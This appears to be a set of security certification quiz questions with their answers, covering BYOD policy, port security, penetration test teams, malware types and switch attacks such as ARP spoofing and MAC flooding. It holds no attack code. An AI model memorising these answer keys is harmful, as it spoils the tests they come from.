Your organization is formulating a bring your own device (BYOD) security policy for mobile devices.Which of the following statements should be considered as you formulate your policy?

You can't use domain-based group policies to enforce security settings on mobile devices.

In which of the following situations would you use port security?

You wanted to restrict the devices that could connect through a switch port

Which of the following types of penetration test teams will provide you information that is most revealing of a real-world hacker attack?

Zero knowledge team

What is the main difference between a worm and a virus?

a worm can replicate itself, while a virus requires a host for distribution

As a security professional, you need to understand your network on multiple levels. You should focus on the following areas:
- Entry points
- Inherent vulnerabilities
- Documentation
- Network baseline
Drag the area of focus on the left to the appropriate example on the right. (Areas of focus may be used once, more than once, or not at all.)

IoT and SCADA devices: Inherent vulnerabilities
Used to identify a weak network architecture or design: Documentation
Public-facing servers, workstations, Wi-Fi networks, and personal devices: Entry points
An older version of Windows that is used for a particular application: Inherent vulnerabilities
What activity looks like in normal day-to-day usage: Network baseline

Drag the description on the left to the appropriate switch attack type shown on the right.

ARP Spoofing/Poisoning: The source device sends frames to the attacker's MAC address instead of the correct device.
Dynamic Trunking Protocol: Should be disabled on the switch's end-user (access) ports before implementing the switch configuration into the network.
MAC Flooding: Causes packets to fill up the forwarding table and consumes so much of the switch's memory that it enters a state called fail-open mode.
MAC Spoofing: Can be used to hide the identity of the attacker's computer or impersonate another device on the network.

Drag the network attack technique on the left to the appropriate description or example on the right. (Each technique may be used once, more than once, or not at all.)

Active attack: Perpetrators attempt to compromise or affect the operations of a system.
External attack: Unauthorized individuals try to breach a network from off-site.
Active attack: Attempting to find the root password on a web server by brute force.
Passive attack: Attempting to gather information without affecting the flow of information on the network.
Passive attack: Sniffing network packets or performing a port scan.

You want to protect the authentication credentials you use to connect to the LAB server in your network by copying them to a USB drive.

back up credentials

Network-based intrusion detection is most suited to detect and prevent which types of attacks?

bandwidth-based denial of service

A collection of zombie computers has been set up to collect personal information. What type of malware do the zombie computers represent?

botnet

